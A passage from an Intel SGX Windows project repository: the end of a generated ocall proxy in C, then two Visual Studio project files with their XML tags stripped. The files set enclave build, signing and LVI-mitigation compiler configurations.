_len_waiters); 570 | ocalloc_size -= _len_waiters; 571 | } else { 572 | ms->ms_waiters = NULL; 573 | } 574 | 575 | ms->ms_total = total; 576 | status = sgx_ocall(5, ms); 577 | 578 | if (status == SGX_SUCCESS) { 579 | if (retval) *retval = ms->ms_retval; 580 | } 581 | sgx_ocfree(); 582 | return status; 583 | } 584 | 585 | #ifdef _MSC_VER 586 | #pragma warning(pop) 587 | #endif 588 | -------------------------------------------------------------------------------- /Bridge/Bridge.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Prerelease 10 | Win32 11 | 12 | 13 | Prerelease 14 | x64 15 | 16 | 17 | Release 18 | Win32 19 | 20 | 21 | Debug 22 | x64 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | Simulation 30 | Win32 31 | 32 | 33 | Simulation 34 | x64 35 | 36 | 37 | 38 | 16.0 39 | Win32Proj 40 | {2cfd429d-ff7f-4f49-a8cb-07c00214f316} 41 | Bridge 42 | 10.0 43 | 44 | 45 | 46 | DynamicLibrary 47 | true 48 | v142 49 | Unicode 50 | 51 | 52 | DynamicLibrary 53 | true 54 | v142 55 | Unicode 56 | 57 | 58 | DynamicLibrary 59 | false 60 | v142 61 | true 62 | Unicode 63 | 64 | 65 | DynamicLibrary 66 | false 67 | v142 68 | true 69 | Unicode 70 | 71 | 72 | DynamicLibrary 73 | true 74 | v142 75 | Unicode 76 | 77 | 78 | DynamicLibrary 79 | true 80 | v142 81 | Unicode 82 | 83 | 84 | DynamicLibrary 85 | false 86 | v142 87 | true 88 | Unicode 89 | 90 | 91 | DynamicLibrary 92 | false 93 | v142 94 | true 95 | Unicode 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 116 | 117 | 118 | 119 | 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | true 129 | 130 | 131 | true 132 | 133 | 134 | false 135 | 136 | 137 | false 138 | 139 | 140 | true 141 | 142 | 143 | true 144 | 145 | 146 | false 147 | 148 | 149 | false 150 | 151 | 152 | 153 | Level3 154 | true 155 | WIN32;_DEBUG;BRIDGE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 156 | true 157 | Use 158 | pch.h 159 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 160 | 161 | 162 | Windows 163 | true 164 | false 165 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 166 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 167 | 168 | 169 | 170 | 171 | Level3 172 | true 173 | WIN32;_DEBUG;BRIDGE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 174 | true 175 | Use 176 | pch.h 177 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 178 | 179 | 180 | Windows 181 | true 182 | false 183 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 184 | sgx_urts_sim.lib;sgx_uae_service_sim.lib;%(AdditionalDependencies) 185 | 186 | 187 | 188 | 189 | Level3 190 | true 191 | true 192 | true 193 | WIN32;NDEBUG;BRIDGE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 194 | true 195 | Use 196 | pch.h 197 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 198 | 199 | 200 | Windows 201 | true 202 | true 203 | true 204 | false 205 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 206 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 207 | 208 | 209 | 210 | 211 | Level3 212 | true 213 | true 214 | true 215 | EDEBUG;WIN32;NDEBUG;BRIDGE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 216 | true 217 | Use 218 | pch.h 219 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 220 | 221 | 222 | Windows 223 | true 224 | true 225 | true 226 | false 227 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 228 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 229 | 230 | 231 | 232 | 233 | Level3 234 | true 235 | _DEBUG;BRIDGE_EXPORTS;_USRDLL;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) 236 | true 237 | NotUsing 238 | pch.h 239 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 240 | 241 | 242 | Windows 243 | true 244 | false 245 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 246 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 247 | 248 | 249 | 250 | 251 | Level3 252 | true 253 | _DEBUG;BRIDGE_EXPORTS;_USRDLL;%(PreprocessorDefinitions) 254 | true 255 | NotUsing 256 | pch.h 257 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 258 | 259 | 260 | Windows 261 | true 262 | false 263 | $(SGXSDKInstallPath)\bin\$(Platform)\Debug;%(AdditionalLibraryDirectories) 264 | sgx_urts_sim.lib;sgx_uae_service_sim.lib;%(AdditionalDependencies) 265 | 266 | 267 | 268 | 269 | Level3 270 | true 271 | true 272 | true 273 | NDEBUG;BRIDGE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 274 | true 275 | Use 276 | pch.h 277 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 278 | 279 | 280 | Windows 281 | true 282 | true 283 | true 284 | false 285 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 286 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 287 | 288 | 289 | 290 | 291 | Level3 292 | true 293 | true 294 | true 295 | EDEBUG;NDEBUG;BRIDGE_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 296 | true 297 | Use 298 | pch.h 299 | $(SGXSDKInstallPath)\include;%(AdditionalIncludeDirectories) 300 | 301 | 302 | Windows 303 | true 304 | true 305 | true 306 | false 307 | $(SGXSDKInstallPath)\bin\$(Platform)\Release;%(AdditionalLibraryDirectories) 308 | sgx_urts.lib;sgx_uae_service.lib;%(AdditionalDependencies) 309 | 310 | 311 | 312 | 313 | 314 | 315 | 316 | 317 | 318 | 319 | 320 | 321 | 322 | 323 | 324 | 325 | 326 | 327 | 328 | 329 | 330 | 331 | 332 | 333 | 334 | 335 | 336 | 337 | 338 | 339 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 340 | Creating untrusted proxy/bridge routines 341 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 342 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 343 | Creating untrusted proxy/bridge routines 344 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 345 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 346 | Creating untrusted proxy/bridge routines 347 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 348 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 349 | Creating untrusted proxy/bridge routines 350 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 351 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 352 | Creating untrusted proxy/bridge routines 353 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 354 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 355 | Creating untrusted proxy/bridge routines 356 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 357 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 358 | Creating untrusted proxy/bridge routines 359 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 360 | "$(SGXSDKInstallPath)\bin\win32\Release\sgx_edger8r.exe" --untrusted ".\..\Enclave2\Enclave2.edl" --search-path ".\..\Enclave2%3b$(SGXSDKInstallPath)\include" 361 | Creating untrusted proxy/bridge routines 362 | $(ProjectDir)%(Filename)_u.h;$(ProjectDir)%(Filename)_u.c;%(Outputs) 363 | 364 | 365 | 366 | 367 | 368 | -------------------------------------------------------------------------------- /Enclave2/Enclave2.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Prerelease 10 | Win32 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Simulation 18 | Win32 19 | 20 | 21 | Debug 22 | x64 23 | 24 | 25 | Prerelease 26 | x64 27 | 28 | 29 | CVE-2020-0551-Load-Prerelease 30 | x64 31 | 32 | 33 | CVE-2020-0551-CF-Prerelease 34 | x64 35 | 36 | 37 | Release 38 | x64 39 | 40 | 41 | CVE-2020-0551-Load-Release 42 | x64 43 | 44 | 45 | CVE-2020-0551-CF-Release 46 | x64 47 | 48 | 49 | Simulation 50 | x64 51 | 52 | 53 | 54 | 10.0.16299.0 55 | {DD541470-E8B8-4E4A-B50A-BB76DF45BCBA} 56 | 57 | 58 | 59 | DynamicLibrary 60 | v142 61 | 62 | 63 | DynamicLibrary 64 | v142 65 | 66 | 67 | DynamicLibrary 68 | v142 69 | 70 | 71 | DynamicLibrary 72 | v142 73 | 74 | 75 | DynamicLibrary 76 | v142 77 | 78 | 79 | DynamicLibrary 80 | v142 81 | 82 | 83 | DynamicLibrary 84 | v142 85 | 86 | 87 | DynamicLibrary 88 | v142 89 | 90 | 91 | DynamicLibrary 92 | v142 93 | 94 | 95 | DynamicLibrary 96 | v142 97 | 98 | 99 | DynamicLibrary 100 | v142 101 | 102 | 103 | DynamicLibrary 104 | v142 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | $(NoInherit) 113 | $(NoInherit) 114 | false 115 | false 116 | 117 | 118 | $(NoInherit) 119 | $(NoInherit) 120 | false 121 | false 122 | 123 | 124 | $(NoInherit) 125 | $(NoInherit) 126 | false 127 | false 128 | 129 | 130 | $(NoInherit) 131 | $(NoInherit) 132 | false 133 | false 134 | 135 | 136 | $(NoInherit) 137 | $(NoInherit) 138 | false 139 | false 140 | 141 | 142 | $(NoInherit) 143 | $(NoInherit) 144 | false 145 | false 146 | 147 | 148 | $(NoInherit) 149 | $(NoInherit) 150 | false 151 | false 152 | 153 | 154 | $(NoInherit) 155 | $(NoInherit) 156 | false 157 | false 158 | 159 | 160 | $(NoInherit) 161 | $(NoInherit) 162 | false 163 | false 164 | 165 | 166 | $(NoInherit) 167 | $(NoInherit) 168 | false 169 | false 170 | 171 | 172 | $(NoInherit) 173 | $(NoInherit) 174 | false 175 | false 176 | 177 | 178 | $(NoInherit) 179 | $(NoInherit) 180 | false 181 | false 182 | 183 | 184 | 185 | Default 186 | MultiThreadedDebug 187 | Disabled 188 | Level3 189 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 190 | 191 | 192 | 193 | 194 | Default 195 | MultiThreadedDebug 196 | Disabled 197 | Level3 198 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 199 | 200 | 201 | sgx_trts_sim.lib;sgx_tstdc.lib;sgx_tservice_sim.lib;sgx_tcrypto.lib;sgx_tcxx.lib 202 | $(SGXSDKInstallPath)bin\$(Platform)\Debug 203 | true 204 | 205 | true 206 | true 207 | 208 | 209 | "$(SGXSDKInstallPath)bin\win32\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml 210 | sign the enclave 211 | 212 | 213 | 214 | 215 | Default 216 | MultiThreaded 217 | MaxSpeed 218 | Level3 219 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 220 | true 221 | 222 | 223 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 224 | $(SGXSDKInstallPath)bin\$(Platform)\$(Configuration) 225 | true 226 | 227 | true 228 | true 229 | true 230 | 231 | 232 | "$(SGXSDKInstallPath)bin\win32\release\sgx_sign.exe" gendata -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.hex" -config "$(ProjectDir)Enclave2.config.xml" 233 | generate the enclave signing material 234 | 235 | 236 | 237 | 238 | Default 239 | MultiThreaded 240 | MaxSpeed 241 | Level3 242 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 243 | true 244 | 245 | 246 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 247 | $(SGXSDKInstallPath)bin\$(Platform)\Release 248 | true 249 | 250 | true 251 | true 252 | true 253 | 254 | 255 | "$(SGXSDKInstallPath)bin\win32\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml" 256 | sign the enclave 257 | 258 | 259 | 260 | 261 | Default 262 | MultiThreadedDebug 263 | Disabled 264 | Level3 265 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 266 | /d2FH4- %(AdditionalOptions) 267 | 268 | 269 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 270 | $(SGXSDKInstallPath)bin\$(Platform)\$(Configuration) 271 | true 272 | 273 | true 274 | true 275 | 276 | 277 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml" 278 | sign the enclave 279 | 280 | 281 | 282 | 283 | Default 284 | MultiThreadedDebug 285 | Disabled 286 | Level3 287 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 288 | /d2FH4- %(AdditionalOptions) 289 | 290 | 291 | sgx_trts_sim.lib;sgx_tstdc.lib;sgx_tservice_sim.lib;sgx_tcrypto.lib;sgx_tcxx.lib 292 | $(SGXSDKInstallPath)bin\$(Platform)\Debug 293 | true 294 | 295 | true 296 | true 297 | 298 | 299 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml" 300 | sign the enclave 301 | 302 | 303 | 304 | 305 | Default 306 | MultiThreaded 307 | MaxSpeed 308 | Level3 309 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 310 | true 311 | /d2FH4- 312 | 313 | 314 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 315 | $(SGXSDKInstallPath)bin\$(Platform)\$(Configuration) 316 | true 317 | 318 | true 319 | true 320 | true 321 | 322 | 323 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" gendata -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.hex" -config "$(ProjectDir)Enclave2.config.xml" 324 | generate the enclave signing material 325 | 326 | 327 | 328 | 329 | Default 330 | MultiThreaded 331 | MaxSpeed 332 | Level3 333 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 334 | true 335 | /Qspectre-load /d2FH4- %(AdditionalOptions) 336 | 337 | 338 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 339 | $(SGXSDKInstallPath)bin\$(Platform)\$(Configuration) 340 | true 341 | 342 | true 343 | true 344 | true 345 | 346 | 347 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" gendata -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.hex" -config "$(ProjectDir)Enclave2.config.xml" 348 | generate the enclave signing material 349 | 350 | 351 | 352 | 353 | Default 354 | MultiThreaded 355 | MaxSpeed 356 | Level3 357 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 358 | true 359 | /Qspectre-load-cf /d2FH4- %(AdditionalOptions) 360 | 361 | 362 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 363 | $(SGXSDKInstallPath)bin\$(Platform)\$(Configuration) 364 | true 365 | 366 | true 367 | true 368 | true 369 | 370 | 371 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" gendata -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.hex" -config "$(ProjectDir)Enclave2.config.xml" 372 | generate the enclave signing material 373 | 374 | 375 | 376 | 377 | Default 378 | MultiThreaded 379 | MaxSpeed 380 | Level3 381 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 382 | true 383 | /d2FH4- 384 | 385 | 386 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 387 | $(SGXSDKInstallPath)bin\$(Platform)\Release 388 | true 389 | 390 | true 391 | true 392 | true 393 | 394 | 395 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml" 396 | sign the enclave 397 | 398 | 399 | 400 | 401 | Default 402 | MultiThreaded 403 | MaxSpeed 404 | Level3 405 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 406 | true 407 | /Qspectre-load /d2FH4- %(AdditionalOptions) 408 | 409 | 410 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 411 | $(SGXSDKInstallPath)bin\$(Platform)\CVE-2020-0551-Load-Release 412 | true 413 | 414 | true 415 | true 416 | true 417 | 418 | 419 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml" 420 | sign the enclave 421 | 422 | 423 | 424 | 425 | Default 426 | MultiThreaded 427 | MaxSpeed 428 | Level3 429 | $(SGXSDKInstallPath)include;$(SGXSDKInstallPath)include\tlibc;$(SGXSDKInstallPath)include\libc++;%(AdditionalIncludeDirectories) 430 | true 431 | /Qspectre-load-cf /d2FH4- %(AdditionalOptions) 432 | 433 | 434 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 435 | $(SGXSDKInstallPath)bin\$(Platform)\CVE-2020-0551-CF-Release 436 | true 437 | 438 | true 439 | true 440 | true 441 | 442 | 443 | "$(SGXSDKInstallPath)bin\x64\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml" 444 | sign the enclave 445 | 446 | 447 | 448 | 449 | sgx_trts.lib;sgx_tstdc.lib;sgx_tservice.lib;sgx_tcrypto.lib;sgx_tcxx.lib 450 | $(SGXSDKInstallPath)bin\$(Platform)\$(Configuration) 451 | true 452 | 453 | true 454 | true 455 | 456 | 457 | "$(SGXSDKInstallPath)bin\win32\release\sgx_sign.exe" sign -key "$(ProjectDir)Enclave2_private.pem" -enclave "$(OutDir)Enclave2.dll" -out "$(OutDir)Enclave2.signed.dll" -config "$(ProjectDir)Enclave2.config.xml 458 | sign the enclave 459 | 460 | 461 | 462 | 463 | 464 | 465 | 466 | 467 | 468 | 469 | 470 | 471 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 472 | Creating proxy/bridge routines 473 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 474 | Enclave2.config.xml;%(AdditionalInputs) 475 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 476 | Creating proxy/bridge routines 477 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 478 | Enclave2.config.xml;%(AdditionalInputs) 479 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 480 | Creating proxy/bridge routines 481 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 482 | Enclave2.config.xml;%(AdditionalInputs) 483 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 484 | Creating proxy/bridge routines 485 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 486 | Enclave2.config.xml;%(AdditionalInputs) 487 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 488 | Creating proxy/bridge routines 489 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 490 | Enclave2.config.xml;%(AdditionalInputs) 491 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 492 | Creating proxy/bridge routines 493 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 494 | Enclave2.config.xml;%(AdditionalInputs) 495 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 496 | Creating proxy/bridge routines 497 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 498 | Enclave2.config.xml;%(AdditionalInputs) 499 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 500 | Creating proxy/bridge routines 501 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 502 | Enclave2.config.xml;%(AdditionalInputs) 503 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 504 | Creating proxy/bridge routines 505 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 506 | Enclave2.config.xml;%(AdditionalInputs) 507 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 508 | Creating proxy/bridge routines 509 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 510 | Enclave2.config.xml;%(AdditionalInputs) 511 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 512 | Creating proxy/bridge routines 513 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 514 | Enclave2.config.xml;%(AdditionalInputs) 515 | "$(SGXSDKInstallPath)bin\win32\release\sgx_edger8r.exe" --trusted "%(FullPath)" --search-path "$(SGXSDKInstallPath)include" 516 | Creating proxy/bridge routines 517 | %(Filename)_t.h;%(Filename)_t.c;%(Outputs) 518 | Enclave2.config.xml;%(AdditionalInputs) 519 | 520 | 521 | 522 | 523 | 524 | 525 | 526 | 527 | 528 | 529 | 530 | --------------------------------------------------------------------------------